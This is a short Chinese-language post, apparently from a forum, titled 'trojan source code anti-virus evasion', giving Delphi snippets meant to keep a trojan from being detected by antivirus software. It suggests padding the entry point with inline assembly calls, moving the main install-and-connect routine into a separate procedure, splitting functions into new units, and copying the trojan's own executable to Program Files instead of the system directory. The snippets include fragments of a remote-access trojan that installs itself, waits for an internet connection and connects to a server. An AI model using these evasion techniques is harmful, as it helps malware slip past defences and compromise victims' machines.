木马源代码免杀处理

木马源代码免杀处理

 

------------------------------------------
有加这样免杀的：
------------------------------------------
begin
  asm  //直接用汇编调用代码进行免杀处理源代码
  call test
end;


Procedure test;
asm
nop
nop
nop
end;
------------------------------------------
我喜欢这样：
------------------------------------------
1，结尾处运行，如

begin
  ReadSettings;
  Install;

  Serv := TServer.Create;
  While Not (InternetGetConnectedState(NIL, 0)) Do Sleep(5000);
  Serv.Connect;
end.
------------------------------------------
你可
Procedure Main;
  ReadSettings;
  Install;

  Serv := TServer.Create;
  While Not (InternetGetConnectedState(NIL, 0)) Do Sleep(5000);
  Serv.Connect;
end;
------------------------------------------
直接调用相当于od里看到的call
begin
  Main;
end.
------------------------------------------
2、加单元，把一些函数搬到那个单元来，哈哈，结构变了，功能没变，一定免杀
------------------------------------------
3、复到系统目录被杀，那就改到复到C:/Program Files

function GetWinDir():String;  //得到系统目录
var ResultDir:Array[1..64] of char;
    i:integer;
begin
  for i:=1 to 64 do resultDir:=char($20);
  GetEnvironmentVariable('windir',@resultDir,64);
  Result:=resultDir;
end;
------------------------------------------
var
myn ,myn2:String;
myn:=ExtractFilename(ParamStr(0));
myn2:=COPY(trim(GetWindir),1,2)+'/Program Files/'+myn; //复制一份到Program Files
if not FileExists(myn2) then
  begin
    copyfile(pchar(ParamStr(0)), pchar(myn2), true);
end;